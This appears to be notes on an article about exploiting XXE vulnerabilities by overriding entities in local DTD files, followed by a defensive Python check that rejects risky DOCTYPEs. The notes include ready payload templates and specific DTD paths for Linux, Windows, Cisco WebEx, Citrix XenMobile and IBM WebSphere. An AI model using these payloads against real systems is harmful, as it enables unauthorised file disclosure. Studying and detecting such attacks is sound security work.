Reference material from https://mohemiv.com/all/exploiting-xxe-with-local-dtd-files/
1. Why use a local DTD

- libxml disabled external entities after 2.9.1.
- A server with an XXE vulnerability may sit behind a firewall and be unable to reach an external entity.
2. Exploitation method

A screenshot of the author's successful exploitation follows.

Here the leading `aaa)` and the extra content at the end act as a closing operation: they close off the surrounding declaration in the original DTD.

In the file sip-app_1_0.dtd you can see `pattern (%condition;)`, and the constructed payload also declares this same parameter entity.
It works because all XML entities are constant. If you define two entities with the same name, only the first one will be used.
That is the original wording; roughly, if two entities with the same name are defined, only the first one is used.

The exploitation approach is very similar to what was studied before; the hard part is finding a local DTD.
3. Finding common local DTDs
Custom Linux System

    <!ENTITY % local_dtd SYSTEM "file:///usr/share/yelp/dtd/docbookx.dtd">
    <!ENTITY % ISOamsa 'Your DTD code'>
    %local_dtd;

Custom Windows System

    <!ENTITY % local_dtd SYSTEM "file:///C:\Windows\System32\wbem\xml\cim20.dtd">
    <!ENTITY % SuperClass '>Your DTD code<!ENTITY test "test"'>
    %local_dtd;

Thanks to @Mike_n1 from Positive Technologies for sharing this path of an always-existing Windows DTD file.

Cisco WebEx

    <!ENTITY % local_dtd SYSTEM "file:///usr/share/xml/scrollkeeper/dtds/scrollkeeper-omf.dtd">
    <!ENTITY % url.attribute.set '>Your DTD code<!ENTITY test "test"'>
    %local_dtd;

Citrix XenMobile Server

    <!ENTITY % local_dtd SYSTEM "jar:file:///opt/sas/sw/tomcat/shared/lib/jsp-api.jar!/javax/servlet/jsp/resources/jspxml.dtd">
    <!ENTITY % Body '>Your DTD code<!ENTITY test "test"'>
    %local_dtd;

Custom Multi-Platform IBM WebSphere Application

    <!ENTITY % local_dtd SYSTEM "./../../properties/schemas/j2ee/XMLSchema.dtd">
    <!ENTITY % xs-datatypes 'Your DTD code'>
    <!ENTITY % simpleType "a">
    <!ENTITY % restriction "b">
    <!ENTITY % boolean "(c)">
    <!ENTITY % URIref "CDATA">
    <!ENTITY % XPathExpr "CDATA">
    <!ENTITY % QName "NMTOKEN">
    <!ENTITY % NCName "NMTOKEN">
    <!ENTITY % nonNegativeInteger "NMTOKEN">
    %local_dtd;
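As an added defensive example (my own code, not from the original article or its author), the following Python pre-parse check flags the DOCTYPE constructs that every payload above relies on: parameter entity declarations, SYSTEM identifiers with file:/jar:/relative locations, and a bare parameter entity reference in the internal subset. The sample documents are constructed; `doctype_findings` and `should_reject` are hypothetical names.

```python
import re

# Entity declarations inside a DOCTYPE internal subset, e.g.
#   <!ENTITY % local_dtd SYSTEM "file:///usr/share/yelp/dtd/docbookx.dtd">
ENTITY_DECL = re.compile(
    r"<!ENTITY\s+(?P<param>%\s*)?(?P<name>[^\s>]+)"
    r"(?:\s+(?P<kind>SYSTEM|PUBLIC)\s+(?:\"[^\"]*\"\s+)?(?P<q>[\"'])(?P<uri>.*?)(?P=q))?",
    re.IGNORECASE | re.DOTALL,
)
# Parameter-entity references such as %local_dtd; that pull the local DTD in
PE_REF = re.compile(r"%([^\s;]+);")
DOCTYPE = re.compile(
    r"<!DOCTYPE\b(?P<decl>.*?)(?:\[(?P<subset>.*?)\]\s*)?>", re.IGNORECASE | re.DOTALL
)


def doctype_findings(xml_text: str) -> list:
    """Return the risk indicators found in an untrusted document's DOCTYPE."""
    m = DOCTYPE.search(xml_text)
    if m is None:
        return []
    findings = ["doctype"]
    if re.search(r"\b(SYSTEM|PUBLIC)\b", m.group("decl"), re.IGNORECASE):
        findings.append("external-dtd")          # <!DOCTYPE x SYSTEM "x.dtd">
    subset = m.group("subset") or ""
    for decl in ENTITY_DECL.finditer(subset):
        name = decl.group("name")
        if decl.group("param"):
            findings.append(f"parameter-entity:{name}")
        uri = decl.group("uri")
        if uri is not None:                      # SYSTEM/PUBLIC: external resource
            scheme = uri.split(":", 1)[0].lower() if ":" in uri else "relative"
            findings.append(f"external-entity:{name}:{scheme}")
    # A bare %name; outside a declaration expands (includes) that entity's content
    for ref in PE_REF.findall(ENTITY_DECL.sub("", subset)):
        findings.append(f"parameter-entity-reference:{ref}")
    return findings


def should_reject(xml_text: str) -> bool:
    """Untrusted client input never needs a DOCTYPE; reject the document if one is present."""
    return bool(doctype_findings(xml_text))


# Constructed samples: the Linux local-DTD pattern from the article, and a benign document
SAMPLE_LOCAL_DTD = """<?xml version="1.0"?>
<!DOCTYPE message [
  <!ENTITY % local_dtd SYSTEM "file:///usr/share/yelp/dtd/docbookx.dtd">
  <!ENTITY % ISOamsa 'Your DTD code'>
  %local_dtd;
]>
<message>hi</message>"""
SAMPLE_BENIGN = '<?xml version="1.0"?><message>hi</message>'
```

Rejecting any DOCTYPE at the boundary is simpler than enumerating local DTD paths, since the same override trick works with any DTD the parser can read; the finding list is useful for logging what an attempt looked like.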